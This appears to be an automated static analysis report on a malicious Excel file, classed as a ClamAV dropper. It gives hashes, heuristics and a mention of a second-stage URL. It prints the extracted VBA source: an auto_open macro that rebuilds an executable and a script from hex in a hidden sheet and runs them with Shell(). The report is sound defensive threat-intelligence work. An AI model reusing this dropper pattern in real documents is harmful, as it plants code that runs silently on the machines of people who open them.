Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 efe51c2453821310…

MALICIOUS

Office (OOXML)

1.57 MB Created: 2019-03-29 08:00:47 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2019-05-16
MD5: 4dbe9dbfb53438d9ce410535355cd973 SHA-1: 816b013c8be6e5708690645964b5d442c085041e SHA-256: efe51c2453821310c7a34dca3054021d0f6d453b7133c381d75e3140901efd12
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Excel document containing VBA macros. The `auto_open` macro is designed to write two files, `AutoHotkeyU32.exe` and `AutoHotkeyU32.ahk`, to `C:\ProgramData\` and then execute them. The script also contains a URL, `http://185.70.186.145/7773/index.php`, which is likely used to download the second-stage payload. The presence of `Shell()` calls and the overall structure strongly indicate a downloader or dropper functionality.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6940774-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6940774-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3671 bytes
SHA-256: 5f3a998d478bf44c91b071c0f41ddb258586f79884ad675b66159d51369c7239
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub auto_open()
    Dim sh As Worksheet
    Dim rw As Range
    
    Set sh = Sheets(" ")
    Dim handle As Long
    handle = FreeFile
    Open "C:\ProgramData\AutoHotkeyU32.exe" For Binary As #1
    Dim hextext As String
    Dim bytes() As Byte
    ReDim bytes(0)
    Dim byteLength As Long
    For Each rw In sh.Rows
        hextext = sh.Cells(rw.Row, 24).Value
        If hextext = "" Then
            Exit For
        End If
    
        For y = 1 To Len(hextext)
            byteLength = UBound(bytes)
            ReDim Preserve bytes(byteLength + 1)
            bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
            
            y = y + 1
        Next y
    Next rw
    ReDim Preserve bytes(byteLength)
    Put #1, , bytes
    Close #1

    Set sh = Sheets(" ")
    handle = FreeFile
    Open "C:\ProgramData\AutoHotkeyU32.ahk" For Binary As #1
    ReDim bytes(0)
    For Each rw In sh.Rows
        hextext = sh.Cells(rw.Row, 25).Value
        If hextext = "" Then
            Exit For
        End If
    
        For y = 1 To Len(hextext)
            byteLength = UBound(bytes)
            ReDim Preserve bytes(byteLength + 1)
            bytes(byteLength) = Val("&h" & Mid(hextext, y, 2))
            
            y = y + 1
        Next y
    Next rw
    ReDim Preserve bytes(byteLength)
    Put #1, , bytes
    Close #1
    
    Dim strProgramName As String
    Dim strArgument As String

    strProgramName = "C:\ProgramData\AutoHotkeyU32.exe"
    strArgument = "C:\ProgramData\AutoHotkeyU32.ahk"

    Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub

Sub show_document()
   On Error Resume Next
   ActiveSheet.Shapes.SelectAll
   Selection.Delete
   On Error GoTo 0
End Sub

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист6"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheet____1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheet____6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: 2d1d0c25ab0cf9bb897664cf245be7297a6435288f5bc23ca79892d3a4f5320e
Detection
ClamAV: Doc.Dropper.Agent-6940774-0
Obfuscation or payload: unlikely